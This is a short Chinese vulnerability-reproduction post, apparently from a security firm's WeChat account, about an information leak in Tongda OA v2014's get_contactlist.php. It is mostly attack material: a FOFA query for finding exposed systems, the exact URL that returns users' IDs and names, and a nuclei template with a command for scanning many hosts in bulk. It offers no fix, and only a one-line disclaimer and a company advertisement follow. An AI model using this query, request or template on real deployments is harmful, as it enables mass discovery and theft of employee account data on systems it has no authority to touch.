漏洞复现 通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞

0x01 漏洞描述

通达OA（OfficeAnywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞，攻击者通过漏洞可以获取敏感信息，进一步攻击.

0x02 漏洞复现

fofa：app="TDXK-通达OA"

1.访问漏洞url，回显出unicode编码的账户信息

/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3

2.解码，得到账户敏感信息

3.编写nuclei脚本进行验证

nuclei命令(-u可改为-l批量验证)：nuclei.exe -t tongdaOA_get_contactlist.yaml -u http://x.x.x.x
脚本：id: TongdaOA_get_contactlist info:  name: Tongda OA get_contactlist.php   author: sm  severity: medium  requests:  - method: GET    path:      - "{{BaseURL}}/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3"
    matchers:      - type: word        words:          - "user_uid"          - "user_name"          - "user_id"        condition: and

(注：本文章为技术分享，禁止任何非授权攻击行为)

网络安全神兵利器分享

0x03 公司简介

江西渝融云安全科技有限公司，2017年发展至今，已成为了一家集云安全、物联网安全、数据安全、等保建设、风险评估、信息技术应用创新及网络安全人才培训为一体的本地化高科技公司，是江西省信息安全产业链企业和江西省政府部门重点行业网络安全事件应急响应队伍成员。
    公司现已获得信息安全集成三级、信息系统安全运维三级、风险评估三级等多项资质认证，拥有软件著作权十八项；荣获2020年全国工控安全深度行安全攻防对抗赛三等奖；庆祝建党100周年活动信息安全应急保障优秀案例等荣誉......

编制：sm

审核：fjh

审核：Dog

原文始发于微信公众号（融云攻防实验室）：漏洞复现 通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞